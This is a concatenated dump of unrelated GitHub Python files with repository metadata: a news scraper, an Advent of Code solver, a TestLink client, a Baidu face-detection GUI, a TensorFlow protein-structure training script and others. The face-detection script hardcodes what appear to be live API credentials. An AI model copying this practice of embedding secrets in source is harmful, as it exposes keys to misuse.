response.xpath('//*[@id=\"moe-detail-box\"]/h1/text()').extract()\n add_time = response.xpath('//*[@id=\"moe-detail-box\"]/div[1]/text()').extract()\n content = response.xpath('//*[@id=\"moe-detail-box\"]/div[2]/p').extract()\n editor = response.xpath('//*[@id=\"detail-editor\"]/text()').extract()\n\n item = GetdataItem()\n item['title'] = title\n item['add_time'] = add_time\n item['content'] = content\n item['editor'] = editor\n\n yield item\n","repo_name":"Clay-J-Lei/jiaoyubuxinwenpachong","sub_path":"getdata/getdata/spiders/jiaoyu.py","file_name":"jiaoyu.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"25848114261","text":"import itertools as iter\nimport collections as col\nimport hashlib as hash\nimport math\nimport json\nimport re\nimport os\nimport sys\n\nfrom autoInput import getInput, startInputClock\nfrom autoSubmit import submitAnswer\n\ndef main(lines):\n\n # PART 1 & PART 2\n S = set({})\n flag = True\n lines = lines[0].split(\", \")\n part1, part2 = 0, 0\n x,y = 0,0\n directions = ['N', 'E', 'S', 'W']\n dir = 0\n lastX, lastY = 0, 0\n for item in lines:\n turn, distance = item[0], int(item[1:])\n if turn == \"R\": dir = (dir + 1) % 4\n elif turn == \"L\": dir = (dir - 1) % 4\n\n if directions[dir] == \"N\":\n y += distance\n lastY = y\n elif directions[dir] == \"E\":\n x += distance\n lastX = x\n elif directions[dir] == \"S\":\n y -= distance\n lastY = y\n elif directions[dir] == \"W\":\n x -= distance\n lastX = x\n if x == lastX: # x didnt change, add new y points to set, update last y\n tempy, templast = y, lastY\n if y < lastY: tempy, templast = lastY, y\n for yi in range(tempy, templast):\n if (x, yi) in S:\n return 0, abs(x) + abs(yi)\n S.add((x, yi))\n lastY = y\n elif y == lastY: # y didnt change, add new x points to set, update last x\n tempx, templast = x, lastX\n if y < lastY: tempy, templast = lastY, y\n for xi in range(tempx, templast):\n if (xi, y) in S:\n return 0, abs(xi) + abs(y)\n S.add((xi, y))\n lastY = y\n part1 = abs(x) + abs(y)\n\n return part1, part2\n\nif __name__ == '__main__':\n PART_1 = False # NOTE: FLIP FOR PART 2 SUBMISSIONS\n\n year, day = os.path.basename(os.getcwd()), re.findall(r'^.*day(\\d+).py$', __file__)[0]\n if not os.path.isfile(f'{os.getcwd()}/day{day}input.txt'):\n getInput(year, day)\n\n lines = [l.strip() for l in open(f'day{day}input.txt').readlines()]\n\n part1, part2 = main(lines)\n print(part1, part2)\n\n SUBMIT = True if input(\"Submit? (Y: / N: NOT )\") == \"\" else False\n if PART_1 and SUBMIT:\n resp = submitAnswer(year, day, 1, part1)\n print(resp)\n if resp == \"CORRECT\": PART_1 = False # NOTE: This is where we update the db file\n elif not PART_1 and SUBMIT:\n resp = submitAnswer(year, day, 2, part2)\n print(resp)\n if resp == \"CORRECT\": print(\"Problem complete.\") # NOTE: This is where we update the db file","repo_name":"chasecolford/AdventOfCode","sub_path":"2016/day1.py","file_name":"day1.py","file_ext":"py","file_size_in_byte":2557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6478282369","text":"import os\n\nfrom testlink.exception.base import TestLinkException\nfrom testlink.resource.project import Projects\nfrom testlink.resource.cases import TestCaseAccess\nfrom testlink.resource.builds import TestBuildAccess\nfrom testlink.resource.suites import TestSuiteAccess\nfrom testlink.resource.plans import TestPlanAccess\nfrom testlink.resource.platform import TestPlatformAccess\nfrom testlink.resource.sundry import MethodResult\nfrom testlink.common import args\n\nimport xmlrpclib\n\nURL_ENV_VAR = \"TESTLINK_URL\"\nKEY_ENV_VAR = \"TESTLINK_KEY\"\n\ndef find_creds():\n \"\"\"\n Searches the user's environment for TestLink credentials and urls\n \"\"\"\n try:\n url = os.environ[URL_ENV_VAR]\n key = os.environ[KEY_ENV_VAR]\n return (url, key)\n except KeyError:\n return (None, None)\n\n\nclass TestLinkClient(TestCaseAccess, TestPlanAccess,\n TestBuildAccess, TestSuiteAccess, TestPlatformAccess):\n DELETE_EXECUTION = 'deleteExecution'\n \n def __init__(self, url=None, key=None):\n \"\"\"\n Create a TestLinkClient\n \"\"\"\n invalid = lambda: not url or not key\n if invalid():\n url, key = find_creds()\n if invalid():\n raise TestLinkException(\"Could not find url or key to connect to the TestLinkAPI\")\n self.url = url\n self.key = key\n self.server = xmlrpclib.Server(url)\n self.projects = Projects(self)\n #Making itself the connection is a bit of a 'hack', but allows a clean\n #interface for getting objects \n self.connection = self \n\n\n def request(self, method, params={}):\n \"\"\"\n Make a request to a method on the server\n \"\"\"\n params[args.DEVKEY] = self.key\n try:\n return getattr(self.server.tl, method)(params)\n except TypeError:\n raise TestLinkException(\"Call failed with parameters: {}\".format(str(params)))\n \n\n def delete_execution_result(self, execution_id):\n \"\"\"\n Delete's an execution result from the server. Useful in conjunction\n with the Testcase.latest_execution_result method\n \"\"\"\n params = {\n args.EXECUTION_ID: execution_id\n }\n results = self.request(self.DELETE_EXECUTION, params=params)\n return MethodResult(**results)\n","repo_name":"adamsar/testlink-python-api","sub_path":"src/testlink/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2349,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"36674382474","text":"import os\nimport PIL\nfrom PIL import Image,ImageTk,ImageDraw,ImageFont\nfrom tkinter import *\nfrom tkinter import filedialog,font\nfrom aip import AipFace\nimport base64\nimport imghdr\nimport math\nimport warnings\nimport copy\n\ndef pointRotate(x,y,rx0,ry0,r):\n x0 = (x-rx0)*math.cos(r*math.pi/180) - (y-ry0)*math.sin(r*math.pi/180) + rx0\n y0 = (x-rx0)*math.sin(r*math.pi/180) + (y-ry0)*math.cos(r*math.pi/180) + ry0\n return x0,y0\ndef rectwithRotation(left,top,width,height,rotate):\n x1,y1 =left,top\n a2=left+width\n b2=top\n a3=left+width\n b3=top+height\n a4=left\n b4=top+height\n x2,y2 = pointRotate(a2,b2,x1,y1,rotate)\n x3,y3 = pointRotate(a3,b3,x1,y1,rotate)\n x4,y4 = pointRotate(a4,b4,x1,y1,rotate)\n return x1,y1,x2,y2,x3,y3,x4,y4\ndef isPic(fileDir):\n fileType = imghdr.what(fileDir)\n picTypes = ['jpg','jpeg','png','bmp','tiff','ico']\n if fileType in picTypes:\n return True\n else:\n return False\ndef formatSize(size):\n strSize = ''\n if size<1024:\n strSize = '{}B'.format(size)\n elif size<1048576:\n strSize = '{:.2f}KB'.format(size/1024)\n elif size<1073741824:\n strSize = '{:.2f}MB'.format(size/1048576)\n return strSize\ndef browseFile():\n global imageEntry,originImage,label_imgo,infoLabel,originFrame\n warnings.simplefilter('ignore', PIL.Image.DecompressionBombWarning)\n fileDir = filedialog.askopenfilename(initialdir =os.curdir)\n if fileDir!='': \n if isPic(fileDir=fileDir): \n imageEntry.config(state=NORMAL)\n imageEntry.delete(0,END)\n imageEntry.insert(0,fileDir)\n imageEntry.config(state=DISABLED)\n img = PIL.Image.open(fileDir)\n img.thumbnail((500,500))\n originImage = ImageTk.PhotoImage(img)\n label_imgo = Label(originFrame,image=originImage)\n label_imgo.place(x=250,y=250,anchor = CENTER)\n size = os.path.getsize(fileDir)\n infoLabel['text']='图片大小:'+ formatSize(size=size)\n else:\n infoLabel['fg']='red'\n infoLabel['text']='错误:图片格式不正确!(支持格式:jpg,jpeg,png,bmp,tiff,ico)'\n\ndef detect():\n global imageEntry,resultImage,label_img,infoLabel\n fileDir = imageEntry.get()\n APP_ID = '11275370'\n API_KEY = '181Wzp3m6V6mrDwDjLg4qcS5'\n SECRET_KEY = 'vuVpNOck5CpIDjv9Z9w5AyPohhjfBGTK'\n\n client = AipFace(APP_ID, API_KEY, SECRET_KEY)\n options = {}\n options[\"face_field\"] = \"age,beauty,gender,glasses\"\n options[\"max_face_num\"] = 10\n options[\"face_type\"] = \"LIVE\"\n\n imageUrl = fileDir\n file = open(imageUrl, 'rb').read()\n bs = base64.b64encode(file)\n image = bytes.decode(bs)\n imageType = \"BASE64\"\n result = client.detect(image, imageType,options)\n print(result)\n filepath,shotname,extension = get_filePath_fileName_fileExt(imageUrl)\n error_code = result['error_code']\n error_msg = result['error_msg']\n if error_code==0:\n face_num = result['result']['face_num']\n face_list = result['result']['face_list']\n img = PIL.Image.open(imageUrl)\n draw=ImageDraw.Draw(img)\n font = ImageFont.truetype(\"AdobeFangsongStd-Regular.otf\",20)\n for i in range(face_num): \n face_probability = '%.2f' % face_list[i]['face_probability']\n age = face_list[i]['age']\n beauty = '%.2f' % face_list[i]['beauty']\n gender = face_list[i]['gender']['type']\n glasses = face_list[i]['glasses']['type']\n print(\"{}号人脸置信度:{} 年龄:{} 颜值:{} 性别:{} 眼镜:{}\".format(i+1,face_probability,age,beauty,gender,glasses))\n if float(face_probability)>=0.5: \n left = face_list[i]['location']['left']\n top = face_list[i]['location']['top']\n width = face_list[i]['location']['width']\n height = face_list[i]['location']['height']\n rotation = face_list[i]['location']['rotation']\n draw.polygon(rectwithRotation(left,top,width,height,rotation),outline=\"red\")\n x = left\n y = top + height\n draw.rectangle((left,top+height,left+100,top+height+100),fill='white')\n draw.text((x,y),\"年龄:\"+str(age),fill='black', font=font)\n draw.text((x,y+20),\"性别:\"+str(gender),fill='black', font=font)\n draw.text((x,y+40),\"颜值:\"+str(beauty),fill='black', font=font)\n draw.text((x,y+60),\"眼镜:\"+str(glasses),fill='black', font=font)\n draw.text((x,y+80),\"置信:\"+str(face_probability),fill='black', font=font)\n img.save(os.curdir+'/new'+shotname+extension)\n thumb = copy.copy(img)\n thumb.thumbnail((500,500))\n resultImage = ImageTk.PhotoImage(thumb)\n label_img = Label(resultFrame,image=resultImage)\n imgW = thumb.size[0]\n imgH = thumb.size[1]\n imgX = (500-imgW)/2\n imgY = (500-imgH)/2\n label_img.place(x=imgX,y=imgY)\n infoLabel['fg']='black'\n infoLabel['text']='图片分析完毕'\n\n \n else:\n print(\"图片解析错误!错误码:{} 错误信息:{}\".format(error_code,error_msg))\n \ndef get_filePath_fileName_fileExt(filename): \n (filepath,tempfilename) = os.path.split(filename)\n (shotname,extension) = os.path.splitext(tempfilename)\n return filepath,shotname,extension\n\n\nroot = Tk()\nroot.resizable(0,0) \nroot.title(\"人脸检测\")\nroot.iconbitmap('b13.ico')\nroot.geometry('1080x620')\n\nmenu = Menu(root)\nmenu.add_command(label='颜值排行榜')\nroot['menu']= menu\n\noriginFrameBorder = Frame(root,height=500,width=500,bd =2,relief=GROOVE)\noriginFrameBorder.grid(row=1,column=0,sticky=W,padx=20,pady=10)\n\noriginFrame = Frame(originFrameBorder,height=500,width=500)\noriginFrame.pack()\n\n\nresultFrameBorder = Frame(root,height=500,width=500,bd =2,relief=GROOVE)\nresultFrameBorder.grid(row=1,column=1,sticky=E,padx=20,pady=10)\n\nresultFrame = Frame(resultFrameBorder,height=500,width=500)\nresultFrame.pack()\n\nselectFrame = Frame(root,height=20,width=500)\nselectFrame.grid(row=2,column=0)\n \ninfoFrame = Frame(root,height=20,width=500)\ninfoFrame.grid(row=2,column=1) \ninfoLabel = Label(infoFrame,text='')\ninfoLabel.pack()\n\nimageLabel = Label(selectFrame,text='图片路径:')\nimageLabel.grid(row=0,column=0)\nimageEntry = Entry(selectFrame,width=60)\nimageEntry.config(state=DISABLED)\nimageEntry.grid(row=0,column=1)\n\nselectFileButton = Button(root,width=20,height=1,text=\"选择图片\",command=browseFile, relief=RIDGE)\nselectFileButton.grid(row=3,column=0,pady=10)\ndetectButton = Button(root,width=20,height=1,text=\"检测\", command=detect, relief=RIDGE)\ndetectButton.grid(row=3,column=1,pady=10)\n\nroot.mainloop()\n","repo_name":"zerolanlan/project-in-github","sub_path":"pathon程序/TopFace-1.py","file_name":"TopFace-1.py","file_ext":"py","file_size_in_byte":6847,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"36186123195","text":"\nimport wikipedia\nimport re\nimport json\nimport random\n\n\ndef get_all_words():\n with open('all words.json', 'rt') as fin:\n data = fin.read()\n\n data = json.loads(data)\n\n all_categories = list(data.keys())\n category = random.choice(all_categories)\n word = ''\n\n for key, pair in data.items():\n if key == category:\n all_words = pair\n\n random.shuffle(all_words)\n\n return category, all_words\n\nall_words, category = get_all_words()\n\n\ndef get_category():\n return category\n\n\ndef get_clue(word):\n try:\n # get the correct line on wikipedia\n main_text = wikipedia.summary(word, sentences=1)\n # remove instances of key word\n main_text = re.sub(word, '_______', main_text, flags=re.IGNORECASE)\n # if key word is \"jumping\" remove instances of \"jump\"\n if word[-3:] == 'ing':\n remove_chars = 3\n if word[-4] == word[-5]:\n remove_chars = 4\n main_text = re.sub(word[0:-remove_chars], '_______', main_text,\n flags=re.IGNORECASE)\n # if key word is \"photography\" remove instances of \"photograph\"\n if word[-1:] == 'y':\n main_text = re.sub(word[0:-1], '_______', main_text,\n flags=re.IGNORECASE)\n # if there are spaces, remove each word ex. Home Depot remove Home and\n # Depot\n if len(word.split(' ')) > 1:\n for part in word.split(' '):\n if part in main_text:\n main_text = re.sub(part, '_______', main_text,\n flags=re.IGNORECASE)\n # remove parenthesis\n main_text = re.sub('\\([^)]*\\)', '', main_text,\n flags=re.IGNORECASE)\n # (sometimes there's still some left behind)\n main_text = main_text.replace('(', '')\n main_text = main_text.replace(')', '')\n\n return main_text\n except:\n print('ERROR ON WORD', word)\n","repo_name":"Michael12309/CrosswordGenerator","sub_path":"Crossword.py","file_name":"Crossword.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"559080002","text":"from animals import Llama\nfrom animals import Goat\nfrom animals import Bunny\nfrom animals import Bobcat\nfrom animals import Ostrich\nfrom animals import Boa\nfrom animals import Python\nfrom animals import Catepillar\nfrom animals import Inchworm\nfrom animals import Cottonmouth\nfrom animals import Clownfish\nfrom animals import Blowfish\nfrom animals import Beluga\nfrom animals import Turtle\nfrom animals import Penguin\nfrom animals import Goose\nfrom animals import Animal\nfrom attractions import PettingZoo\nfrom attractions import WetLands\nfrom attractions import ReptileHouse\nfrom attractions import Attraction\n# from movements import Walking\n# from movements import Swimming\n# from movements import Slithering\n\nbob = Goose(\"Bob\", \"Canada goose\", \"morning\",\"watercress sandwiches\", 44995)\nbob.run()\nbob.swim()\n\nmiss_fuzz = Llama(\"Miss Fuzz\", \"domestic llama\", \"midday\", \"llama chow\", 55234)\nprint(miss_fuzz.chip_number)\n\n\nprint(miss_fuzz.name)\nprint(f'{miss_fuzz.name}, the {miss_fuzz.species}, is available to pet during the {miss_fuzz.shift} shift.')\nmiss_fuzz.feed()\n\nfuzz_butt = Goat(\"Fuzz Butt\", \"cutest baby goat ever\", \"morning\", \"goat food\", 55012)\nprint(fuzz_butt)\nprint(f'{fuzz_butt.name}, the {fuzz_butt.species}, is available to pet during the {fuzz_butt.shift} shift.')\nfuzz_butt.feed()\n\nbugs = Bunny(\"Bugs\", \"wraskly rabbit\", \"afternoon\", \"carrots\", 55901)\nprint(bugs)\nprint(f'{bugs.name}, the {bugs.species}, is available to pet during the {bugs.shift} shift.')\nbugs.feed()\n\nrufus = Bobcat(\"Rufus\", \"best party cat\", \"morning\", \"bobcat chow\", 55743)\nprint(rufus)\nprint(f'{rufus.name}, the {rufus.species}, is available to pet during the {rufus.shift} shift.')\nrufus.feed()\n\njerkface = Ostrich(\"Jerk Face\", \"biggest jerkiest bird ever\", \"afternoon\", \"stolen pellets\", 55821)\nprint(jerkface)\nprint(f'{jerkface.name}, the {jerkface.species}, is available to pet during the {jerkface.shift} shift.')\njerkface.feed()\n\neek = Python(\"Eek\", \"slimy\", \"ill behaved children\", 33935)\nprint(eek)\neek.feed()\n\nheckno = Boa(\"Heck No\", \"nope\", \"mice\", 33912)\nprint(heckno)\nheckno.feed()\n\nbecoming = Catepillar(\"Becoming Butterfly\", \"transitional\", \"milkweed\", 33054)\nprint(becoming)\nbecoming.feed()\n\ntiny = Inchworm('Tiny', \"green worm\", \"worm food\", 33664)\nprint(tiny)\ntiny.feed()\n\n\ngross = Cottonmouth(\"Gross\", \"run away\", \"mice\", 33742)\nprint(gross)\ngross.feed()\n\nnemo = Clownfish(\"Nemo\", \"rebellious kid fish\", \"fish food\", 77001)\nprint(nemo)\nnemo.feed()\n\nnotouchy = Blowfish(\"No Touchy\", \"spiky fish\", \"fish food\", 77824)\nprint(notouchy)\nnotouchy.feed()\n\ndude = Turtle(\"Dude\", \"wise turtle\", \"turtle chow\", 77931)\nprint(dude)\ndude.feed()\n\nsmooshy = Beluga(\"Smooshy\", \"darn cute whale\", \"whale mix\", 77096)\nprint(smooshy)\nsmooshy.feed()\n\ntuxedo = Penguin(\"Tuxedo\", \"formal cutie\", \"baby fish\", 77843)\nprint(tuxedo)\ntuxedo.feed()\n\ndef report_animals_by_attractions(*attractions):\n\n for attraction in attractions:\n print(f'{attraction.attraction_name} is where you can find {attraction.description} like:')\n for animal in attraction.animals:\n print(f'* {animal.name} the {animal.species}.')\n\n\nvarmint_village = PettingZoo(\"Varmint Village\", \"cute and fuzzy critters to cuddle!\")\nvarmint_village.animals.extend([bugs, miss_fuzz, fuzz_butt, rufus, jerkface])\nfor animal in varmint_village.animals:\n print(f'You can find {animal.name} the {animal.species} in {varmint_village.attraction_name}.')\nprint(varmint_village.last_critter_added)\n# varmint_village.add_animal(bob)\n# for animal in varmint_village.animals:\n# print(animal)\n\nslither_inn = ReptileHouse(\"Slither Inn\", \"snakes and slimy things of all sizes\")\nslither_inn.animals.extend([eek, heckno, becoming, tiny, gross])\nfor animal in slither_inn.animals:\n print(f'You can find {animal.name} the {animal.species} in {slither_inn.attraction_name}.')\nprint(slither_inn.last_critter_added)\n\n\ncritter_cove = WetLands(\"Critter Cover\", \"one acre walk through with lots of water animals\")\ncritter_cove.animals.extend([nemo, notouchy, dude, smooshy, tuxedo])\nfor animal in critter_cove.animals:\n print(f'You can find {animal.name} the {animal.species} in {critter_cove.attraction_name}.')\nprint(critter_cove.last_critter_added)\n\nreport_animals_by_attractions(critter_cove, slither_inn, varmint_village)","repo_name":"mbrownlee/CrittersAndCroquettes","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":4287,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"74872837905","text":"from django.conf.urls import include, url\n# from django.contrib import admin\n\n # Examples:\n # url(r'^$', 'html_portfolio.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n # url(r'^admin/', include(admin.site.urls)),\n # -----------------------------------------------\n\nurlpatterns = [\n url(r'^javapic/', include('javapic.urls', namespace='javapic')),\n url(r'^javapic_jquery/', include('javapic_jquery.urls', namespace='javapic_jquery')),\n url(r'^zen_mockup/', include('zen_mockup.urls')),\n url(r'^forum/', include('forum.urls')),\n\n # new url patterns should be coded above\n url(r'^', include('home.urls')),\n]\n","repo_name":"PDXDevCampJuly/michael_devCamp","sub_path":"django/html_portfolio/html_portfolio/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72284033106","text":"# from PyQt6 import QtWidgets\n# from PyQt6.QtWidgets import QApplication, QMainWindow\n# import sys\n#\n# from controlPanel2 import Ui_MainWindow\n#\n#\n# def window():\n# app = QApplication(sys.argv)\n# win = QMainWindow()\n# win.setGeometry(330,222,300,300)\n# win.setWindowTitle(\"start\")\n#\n# pushButton = QtWidgets.QPushButton(win)\n# pushButton.setGeometry(72, 127, 111, 221)\n# pushButton.sizeHint()\n# pushButton.setObjectName(\"pushButton\")\n#\n# win.show()\n# sys.exit(app.exec())\n#\n# # window()\n# # print(\"test\")\nfrom PySide6 import QtWidgets\n\nfrom controlPanel2 import Ui_MainWindow\n\nif __name__ == \"__main__\":\n import sys\n app = QtWidgets.QApplication(sys.argv)\n MainWindow = QtWidgets.QMainWindow()\n ui = Ui_MainWindow()\n ui.setupUi(MainWindow)\n MainWindow.show()\n sys.exit(app.exec_())\n","repo_name":"czogran/rys","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7835594502","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 16 18:41:38 2020\n\n@author: xugang\n\n\"\"\"\nimport time\nfrom my_model import Model\nimport tensorflow as tf\nimport numpy as np\nfrom tensorflow import keras\nfrom utils import InputReader, cal_accurarcy\n\nif __name__ == '__main__':\n \n #parameters of training\n batch_size = 4\n epochs = 40\n early_stop = 4\n input_normalization = True\n learning_rate = 1e-3\n \n params = {}\n params[\"d_input\"] = 76\n params[\"d_ss8_output\"] = 8\n params[\"d_ss3_output\"] = 3\n params[\"d_phipsi_output\"] = 4\n params[\"d_csf_output\"] = 3\n params[\"d_asa_output\"] = 1\n params[\"d_rota_output\"] = 8\n params[\"dropout_rate\"] = 0.25\n \n #parameters of transfomer model\n params[\"transfomer_layers\"] = 2\n params[\"transfomer_num_heads\"] = 4\n \n #parameters of birnn model\n params[\"lstm_layers\"] = 4\n params[\"lstm_units\"] = 1024\n \n #parameters of cnn model\n params[\"cnn_layers\"] = 5\n params[\"cnn_channels\"] = 32\n \n params[\"save_path\"] = r'./models'\n \n gpus = tf.config.experimental.list_physical_devices('GPU')\n tf.config.experimental.set_visible_devices(gpus[0], 'GPU')\n logical_gpus = tf.config.experimental.list_logical_devices('GPU')\n print(len(gpus), len(logical_gpus))\n\n train_list_path = \"/data/xugang/opus_contact/SPOT-1D/dataset/SPOT-1D-dataset/opus_dataset/clean/list_train\"\n val_list_path = \"/data/xugang/opus_contact/SPOT-1D/dataset/SPOT-1D-dataset/opus_dataset/clean/list_val\"\n test_list_path = \"/data/xugang/opus_contact/SPOT-1D/dataset/SPOT-1D-dataset/opus_dataset/clean/list_test2016\"\n \n inputs_files_path = \"/data/xugang/opus_contact/SPOT-1D/dataset/SPOT-1D-dataset/opus_dataset/clean/inputs\"\n labels_files_path = \"/data/xugang/opus_contact/SPOT-1D/dataset/SPOT-1D-dataset/opus_dataset/clean/labels\" \n \n model_c5 = Model(params=params, name=\"c5\")\n \n train_reader = InputReader(data_list=train_list_path,\n inputs_files_path=inputs_files_path,\n labels_files_path=labels_files_path,\n num_batch_size=batch_size,\n input_norm=input_normalization, \n shuffle=True,\n data_enhance=True)\n \n val_reader = InputReader(data_list=val_list_path,\n inputs_files_path=inputs_files_path,\n labels_files_path=labels_files_path,\n num_batch_size=batch_size,\n input_norm=input_normalization, \n shuffle=False,\n data_enhance=False)\n \n test_reader = InputReader(data_list=test_list_path,\n inputs_files_path=inputs_files_path,\n labels_files_path=labels_files_path,\n num_batch_size=batch_size,\n input_norm=input_normalization, \n shuffle=False,\n data_enhance=False)\n \n lr = tf.Variable(tf.constant(learning_rate), name='lr', trainable=False)\n optimizer = keras.optimizers.Adam(lr=lr)\n\n def train_step(x, x_mask, y, y_mask):\n \n ss8_predictions = ss3_predictions = phipsi_predictions = \\\n csf_predictions = asa_predictions = rota_predictions = None\n\n with tf.GradientTape() as tape:\n ss8_predictions, ss3_predictions, phipsi_predictions, \\\n csf_predictions, asa_predictions, rota_predictions, loss = \\\n model_c5.inference(x, x_mask, y, y_mask, training=True) \n \n trainable_variables = model_c5.transformer.trainable_variables + \\\n model_c5.cnn.trainable_variables + model_c5.birnn.trainable_variables\n gradients = tape.gradient(loss, trainable_variables)\n optimizer.apply_gradients(\n zip(gradients, trainable_variables))\n \n return loss, ss8_predictions, ss3_predictions, phipsi_predictions, \\\n csf_predictions, asa_predictions, rota_predictions\n\n def infer_step(x, x_mask):\n \n ss8_predictions = ss3_predictions = phipsi_predictions = \\\n csf_predictions = asa_predictions = rota_predictions = None\n \n ss8_predictions, ss3_predictions, phipsi_predictions, \\\n csf_predictions, asa_predictions, rota_predictions, _ = \\\n model_c5.inference(x, x_mask, y, y_mask, training=False)\n \n return ss8_predictions, ss3_predictions, phipsi_predictions, \\\n csf_predictions, asa_predictions, rota_predictions\n \n best_val_acc = 0\n for epoch in range(epochs):\n \n #======================Train======================\n accuracy_train_ss8 = []\n accuracy_train_ss3 = []\n accuracy_train_phi = []\n accuracy_train_psi = []\n for step, filenames_batch in enumerate(train_reader.dataset):\n start_time = time.time()\n # x (batch, max_len, 76)\n # x_mask (batch, max_len)\n # encoder_padding_mask (batch, 1, 1, max_len)\n # y (batch, max_len, 30)\n # y_mask (batch, max_len, 30)\n filenames, x, x_mask, y, y_mask, inputs_total_len, labels_total_len = \\\n train_reader.read_file_from_disk(filenames_batch)\n \n assert inputs_total_len == labels_total_len\n\n loss, ss8_predictions, ss3_predictions, phipsi_predictions, \\\n csf_predictions, asa_predictions, rota_predictions = \\\n train_step(x, x_mask, y, y_mask)\n \n accuracy_train_ss8.extend(\n cal_accurarcy(\"SS8\", ss8_predictions, y, y_mask, total_len=inputs_total_len))\n \n accuracy_train_ss3.extend(\n cal_accurarcy(\"SS3\", ss3_predictions, y, y_mask, total_len=inputs_total_len))\n \n mae_phi, mae_psi = cal_accurarcy(\"PhiPsi\", phipsi_predictions, y, y_mask, total_len=inputs_total_len)\n accuracy_train_phi.extend(mae_phi)\n accuracy_train_psi.extend(mae_psi)\n \n run_time = time.time() - start_time\n \n if step % 10 == 0:\n print('Epoch: %d, step: %d, loss: %3.3f, acc8: %3.4f, acc3: %3.4f, phi: %3.2f, psi: %3.2f, time: %3.3f'\n % (epoch, step, loss, np.mean(accuracy_train_ss8), np.mean(accuracy_train_ss3), \n np.mean(accuracy_train_phi), np.mean(accuracy_train_psi), run_time)) \n\n #======================Val======================\n accuracy_val_ss8 = []\n accuracy_val_ss3 = []\n accuracy_val_phi = []\n accuracy_val_psi = []\n start_time = time.time()\n for step, filenames_batch in enumerate(val_reader.dataset):\n \n filenames, x, x_mask, y, y_mask, inputs_total_len, labels_total_len = \\\n val_reader.read_file_from_disk(filenames_batch)\n \n assert inputs_total_len == labels_total_len\n\n ss8_predictions, ss3_predictions, phipsi_predictions, \\\n csf_predictions, asa_predictions, rota_predictions = \\\n infer_step(x, x_mask)\n \n accuracy_val_ss8.extend(\n cal_accurarcy(\"SS8\", ss8_predictions, y, y_mask, total_len=inputs_total_len))\n\n accuracy_val_ss3.extend(\n cal_accurarcy(\"SS3\", ss3_predictions, y, y_mask, total_len=inputs_total_len))\n\n mae_phi, mae_psi = cal_accurarcy(\"PhiPsi\", phipsi_predictions, y, y_mask, total_len=inputs_total_len)\n accuracy_val_phi.extend(mae_phi)\n accuracy_val_psi.extend(mae_psi)\n \n run_time = time.time() - start_time\n print('Epoch: %d, lr: %s, acc8: %3.4f, acc3: %3.4f, phi: %3.2f, psi: %3.2f, time: %3.3f'\n % (epoch, str(lr.numpy()), np.mean(accuracy_val_ss8), np.mean(accuracy_val_ss3), \n np.mean(accuracy_val_phi), np.mean(accuracy_val_psi), run_time)) \n \n if np.mean(accuracy_val_ss8) > best_val_acc:\n best_val_acc = np.mean(accuracy_val_ss8)\n model_c5.save_model()\n else:\n lr.assign(lr/2)\n early_stop -= 1\n \n if early_stop == 0:\n break\n \n print (\"best_val_acc:\", best_val_acc)\n \n #======================Test======================\n\n model_c5_test = Model(params=params, name=\"c5\")\n model_c5_test.load_model()\n \n def test_infer_step(x, x_mask):\n\n ss8_predictions = ss3_predictions = phipsi_predictions = \\\n csf_predictions = asa_predictions = rota_predictions = None\n \n ss8_predictions, ss3_predictions, phipsi_predictions, \\\n csf_predictions, asa_predictions, rota_predictions, _ = \\\n model_c5_test.inference(x, x_mask, y, y_mask, training=False)\n \n return ss8_predictions, ss3_predictions, phipsi_predictions, \\\n csf_predictions, asa_predictions, rota_predictions\n \n accuracy_test_ss8 = []\n accuracy_test_ss3 = []\n accuracy_test_phi = []\n accuracy_test_psi = []\n start_time = time.time()\n for step, filenames_batch in enumerate(test_reader.dataset):\n \n filenames, x, x_mask, y, y_mask, inputs_total_len, labels_total_len = \\\n test_reader.read_file_from_disk(filenames_batch)\n \n assert inputs_total_len == labels_total_len\n\n ss8_predictions, ss3_predictions, phipsi_predictions, \\\n csf_predictions, asa_predictions, rota_predictions = \\\n test_infer_step(x, x_mask)\n\n accuracy_test_ss8.extend(\n cal_accurarcy(\"SS8\", ss8_predictions, y, y_mask, total_len=inputs_total_len))\n\n accuracy_test_ss3.extend(\n cal_accurarcy(\"SS3\", ss3_predictions, y, y_mask, total_len=inputs_total_len))\n\n mae_phi, mae_psi = cal_accurarcy(\"PhiPsi\", phipsi_predictions, y, y_mask, total_len=inputs_total_len)\n accuracy_test_phi.extend(mae_phi)\n accuracy_test_psi.extend(mae_psi)\n \n run_time = time.time() - start_time\n print('Acc8: %3.4f, Acc3: %3.4f, Phi: %3.2f, Psi: %3.2f, time: %3.3f'\n % (np.mean(accuracy_test_ss8), np.mean(accuracy_test_ss3), \n np.mean(accuracy_test_phi), np.mean(accuracy_test_psi), run_time)) \n","repo_name":"thuxugang/opus_tass","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":10500,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"48"} +{"seq_id":"37267697023","text":"import networkx as nx\nimport pylab as P\nimport matplotlib.pyplot as plt\ndef dijkstra(graph,src,dest,visited=[],distances={},predecessors={}):\n \n \n if src == dest:\n # on créé the shortest path et on l'affiche\n path=[]\n pred=dest\n while pred != None:\n path.append(pred)\n pred=predecessors.get(pred,None)\n print('shortest path: '+str(path)+\" cost=\"+str(distances[dest])) \n else : \n \n if not visited: \n distances[src]=0\n for neighbor in 